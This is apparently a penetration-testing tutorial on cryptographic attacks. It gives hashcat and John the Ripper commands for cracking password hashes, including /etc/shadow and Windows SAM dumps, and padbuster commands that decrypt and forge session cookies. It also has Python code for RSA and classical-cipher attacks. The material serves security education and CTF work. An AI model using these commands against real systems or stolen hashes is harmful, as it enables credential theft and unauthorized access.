Cryptographic Attacks: Hash Cracking, Padding Oracle, RSA Vulnerabilities and More

Cryptography is the mathematical foundation of information security — and like all mathematical systems, cryptographic algorithms can have weaknesses that are exploitable under specific conditions. This article covers the practical attack techniques used by penetration testers and security researchers against commonly deployed cryptographic implementations: hash cracking, padding oracle attacks, RSA vulnerabilities, and classical cipher analysis. Understanding these attacks is essential both for offensive security work and for making informed decisions about cryptographic algorithm selection.

Hash Algorithm Reference

hashcat — GPU-Accelerated Password Recovery

Core Syntax and Attack Modes

# hashcat basic syntax:
# hashcat -m HASH_TYPE -a ATTACK_MODE HASH_FILE WORDLIST/MASK [OPTIONS]

# Attack modes (-a):
# 0 = Straight (dictionary)
# 1 = Combination (combine two wordlists)
# 3 = Brute-force/Mask
# 6 = Hybrid wordlist + mask
# 7 = Hybrid mask + wordlist

# Basic dictionary attack
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt        # MD5
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt     # NTLM
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt     # SHA512crypt
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt     # bcrypt

# Identify hash type automatically
hashcat --identify hash_to_identify.txt
# Or use hash-identifier tool:
hash-identifier 5f4dcc3b5aa765d61d8327deb882cf99

Rules-Based Attacks

# Rules transform each word in the wordlist
# Location: /usr/share/hashcat/rules/

# Built-in rule files:
# best64.rule     — 64 most effective transformations
# d3ad0ne.rule    — aggressive mutation
# dive.rule       — comprehensive mutations
# rockyou-30000.rule — 30,000 rules derived from real passwords
# T0XlC.rule      — large comprehensive ruleset

# Apply rules
hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Combine multiple rule files
hashcat -m 1000 hashes.txt rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule \
  -r /usr/share/hashcat/rules/d3ad0ne.rule

# Common rule syntax:
# c     = Capitalize first letter (password → Password)
# u     = Uppercase all (password → PASSWORD)
# l     = Lowercase all
# r     = Reverse (password → drowssap)
# d     = Duplicate (password → passwordpassword)
# $X    = Append character X ($1 appends '1')
# ^X    = Prepend character X
# sXY   = Replace X with Y
# D0    = Delete first character
# p2    = Duplicate word twice

# Example rule: Capitalize + append year
# c $2 $0 $2 $4 → Password2024

Mask Attacks (Brute Force)

# Mask syntax:
# ?l = lowercase letter (a-z)
# ?u = uppercase letter (A-Z)
# ?d = digit (0-9)
# ?s = special characters
# ?a = all characters (?l?u?d?s)
# ?b = all bytes (0x00-0xFF)

# 8-character lowercase + digits
hashcat -m 1000 hashes.txt -a 3 ?l?l?l?l?d?d?d?d

# Common enterprise pattern: Capital + 6 lower + 2 digits + !
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?l?d?d?s

# Specific length range (increment mode)
hashcat -m 1000 hashes.txt -a 3 --increment --increment-min=6 --increment-max=10 ?a?a?a?a?a?a?a?a?a?a

# NTLM password of exactly format: Company + YEAR + !
# Custom charset: define positions
hashcat -m 1000 hashes.txt -a 3 -1 ?u -2 ?d Company?2?2?2?2?s

# LM hash cracking (extremely fast — LM splits password into 7-char halves)
hashcat -m 3000 hashes.txt -a 3 ?a?a?a?a?a?a?a

Hybrid and Combination Attacks

# Hybrid: Wordlist + mask appended
hashcat -m 0 hashes.txt -a 6 rockyou.txt ?d?d?d?d
# Tries each word in rockyou with 4 digits appended

# Hybrid: Mask + wordlist prepended
hashcat -m 0 hashes.txt -a 7 ?d?d rockyou.txt
# Tries 2 digits prepended to each word

# Combination: Two wordlists combined
hashcat -m 0 hashes.txt -a 1 words1.txt words2.txt
# Combines every word from list1 with every word from list2

Performance Options

# OpenCL device selection
hashcat -I    # list devices
hashcat -m 1000 hashes.txt rockyou.txt -d 1   # use device 1

# Performance tuning
hashcat -m 1000 hashes.txt rockyou.txt -w 3    # workload profile 3 (High)
hashcat -m 1000 hashes.txt rockyou.txt -O      # optimized kernel

# Session management
hashcat -m 1000 hashes.txt rockyou.txt --session=mysession
hashcat --restore --session=mysession   # resume

# Show cracked hashes
hashcat -m 1000 hashes.txt --show
hashcat -m 1000 hashes.txt --show --outfile-format=2   # hash:plain

John the Ripper

# Auto-detect hash type and crack
john hashes.txt

# Specify format
john --format=raw-md5 hashes.txt
john --format=NT hashes.txt         # NTLM
john --format=sha512crypt hashes.txt
john --format=bcrypt hashes.txt

# Wordlist mode
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Rules + wordlist
john --wordlist=rockyou.txt --rules hashes.txt
john --wordlist=rockyou.txt --rules=best64 hashes.txt

# Incremental (brute force)
john --incremental hashes.txt
john --incremental=Digits hashes.txt

# Crack /etc/shadow
john /etc/shadow

# Crack Windows SAM + SYSTEM (with samdump2)
samdump2 /path/to/SYSTEM /path/to/SAM > ntlm_hashes.txt
john --format=NT ntlm_hashes.txt

# Show cracked passwords
john --show hashes.txt
john --show --format=NT hashes.txt

Rainbow Tables

Rainbow tables are precomputed chains of hash-to-plaintext mappings that trade storage space for computation time. They are most effective against unsalted hashes like NTLM and LM.

# RainbowCrack — generate and use rainbow tables
# Download precomputed tables from: https://project-rainbowcrack.com/table.htm
# Or generate your own:

# Generate a rainbow table for NTLM, 8 characters, alphanumeric
rtgen ntlm loweralpha-numeric 1 8 0 1000 100000 0

# Sort the table (required before lookup)
rtsort *.rt

# Crack hashes using tables
rcrack /path/to/tables/ -h NTLM_HASH_HERE
rcrack /path/to/tables/ -l hashes_file.txt

# Ophcrack — free Windows tool with free LM/NTLM rainbow tables
# Download tables: https://ophcrack.sourceforge.io/tables.php

# Why salting defeats rainbow tables:
# salt = "a4b8" + password = "a4b8password"
# Hash of "a4b8password" is completely different from hash of "password"
# Each user has unique salt → each entry needs its own rainbow table
# bcrypt/scrypt/Argon2 always use per-user salts → rainbow tables infeasible

Padding Oracle Attack

The Padding Oracle attack exploits a system that reveals whether decryption padding is valid or invalid. This side-channel allows an attacker to decrypt data without knowing the encryption key, and in some variants, forge valid ciphertext.

CBC Mode and PKCS#7 Padding

# CBC (Cipher Block Chaining) mode:
# Each plaintext block is XORed with the previous ciphertext block before encryption
# Decryption: D(C_i) XOR C_{i-1} = P_i

# PKCS#7 Padding:
# If plaintext length is not a multiple of block size, pad with N bytes of value N
# e.g., 3 bytes short: 03 03 03
# e.g., 1 byte short:  01
# e.g., Full block:    10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10

# Padding Oracle: An oracle that says "padding valid" or "padding invalid"
# HTTP example:
# 200 OK = valid padding
# 500 Internal Server Error = invalid padding (decryption failed)
# Can be timing difference instead of error message

Padding Oracle Exploitation with padbuster

# padbuster automates CBC padding oracle attacks

# Basic usage: decrypt encrypted cookie value
padbuster https://target.com/profile ENCRYPTED_VALUE 8 -cookies "session=ENCRYPTED_VALUE"
# 8 = block size in bytes (AES = 16, DES = 8)

# Decrypt base64-encoded parameter
padbuster https://target.com/profile BASE64_VALUE 16 -encoding 0 -cookies "auth=BASE64_VALUE"
# -encoding 0 = base64, 1 = hex, 2 = net, 3 = web (URL-safe base64), 4 = base64_url

# Forge ciphertext (encrypt arbitrary plaintext)
padbuster https://target.com/profile ENCRYPTED_VALUE 16 -plaintext '{"admin":true}'

# Custom error detection (when not a 500 error)
padbuster https://target.com/profile VALUE 16 -error "Invalid"

# POODLE (Padding Oracle On Downgraded Legacy Encryption):
# Exploits SSLv3 CBC padding vulnerability (CVE-2014-3566)
# Attacker-in-the-middle downgrades connection to SSLv3
# Uses padding oracle to decrypt HTTPS cookies

RSA Vulnerabilities

RSA is the most widely deployed asymmetric encryption algorithm. While RSA itself is mathematically sound with proper parameters, many real-world deployments have exploitable weaknesses.

Small Public Exponent Attack (e=3)

# If e is small (e=3) and message m is small enough that m^e < n
# Then RSA encryption c = m^e mod n = m^e (without modular reduction)
# Simply take the e-th root of c to recover m

# Python example:
from gmpy2 import iroot

c = int("CIPHERTEXT_HEX", 16)
e = 3

# Take cube root
m, exact = iroot(c, e)
if exact:
    plaintext = m.to_bytes((m.bit_length() + 7) // 8, 'big')
    print("Recovered plaintext:", plaintext)

Common Modulus Attack

# If the same message is encrypted with the same modulus n but different exponents e1, e2
# and gcd(e1, e2) = 1, then message can be recovered without private key

# Given: c1 = m^e1 mod n, c2 = m^e2 mod n
# Find s1, s2 where s1*e1 + s2*e2 = 1 (Extended Euclidean algorithm)
# Then: m = c1^s1 * c2^s2 mod n

from gmpy2 import gcdext, powmod

def common_modulus_attack(n, e1, e2, c1, c2):
    g, s1, s2 = gcdext(e1, e2)
    if g != 1:
        return None
    if s1 < 0:
        c1 = powmod(c1, -s1, n)
        s1 = -s1
    else:
        c1 = powmod(c1, s1, n)
    if s2 < 0:
        c2 = powmod(c2, -s2, n)
        s2 = -s2
    else:
        c2 = powmod(c2, s2, n)
    m = (c1 * c2) % n
    return m

Wiener's Attack (Small Private Exponent)

# If private exponent d is small (d < n^0.25 / 3), Wiener's attack recovers d
# Using continued fraction expansion of e/n

# Python implementation using owiener library
pip install owiener

import owiener

e = int("EXPONENT", 16)
n = int("MODULUS", 16)

d = owiener.attack(e, n)
if d:
    print(f"Found private exponent d = {d}")
else:
    print("Wiener's attack failed — d may not be small enough")

Factoring Small Moduli

# If n is small or uses weak primes, factor it directly
# FactorDB: http://www.factordb.com — check if n is already factored

import requests

def factordb_query(n):
    r = requests.get(f"http://factordb.com/api?query={n}")
    return r.json()

# SageMath — powerful mathematical software for crypto attacks
# factor(n) directly in SageMath
# yafu: fast factoring tool for CTF-sized moduli

# For CTF RSA challenges:
# Check for smooth numbers (small prime factors)
# Check for Fermat factorization (p and q are close together)
# Check for shared primes across multiple keys (GCD attack)

# GCD attack: If two different n's share a prime factor
from math import gcd
p = gcd(n1, n2)   # If p != 1, you've factored both moduli!

Frequency Analysis on Classical Ciphers

# Caesar cipher (shift cipher)
# Brute force all 25 shifts
def caesar_decrypt(ciphertext, shift):
    result = ''
    for char in ciphertext.upper():
        if char.isalpha():
            result += chr((ord(char) - 65 - shift) % 26 + 65)
        else:
            result += char
    return result

for shift in range(26):
    print(f"Shift {shift}: {caesar_decrypt(ciphertext, shift)}")

# Vigenère cipher — polyalphabetic substitution
# Step 1: Determine key length using Index of Coincidence or Kasiski test
# Step 2: Split ciphertext into groups of key_length
# Step 3: Each group is a Caesar cipher — use frequency analysis

# English letter frequencies (most common):
# E: 12.7%, T: 9.1%, A: 8.2%, O: 7.5%, I: 7.0%, N: 6.7%
# Most common cipher letter → likely 'E'

def frequency_analysis(ciphertext):
    freq = {}
    total = 0
    for char in ciphertext.upper():
        if char.isalpha():
            freq[char] = freq.get(char, 0) + 1
            total += 1
    return {k: v/total for k, v in sorted(freq.items(), key=lambda x: -x[1])}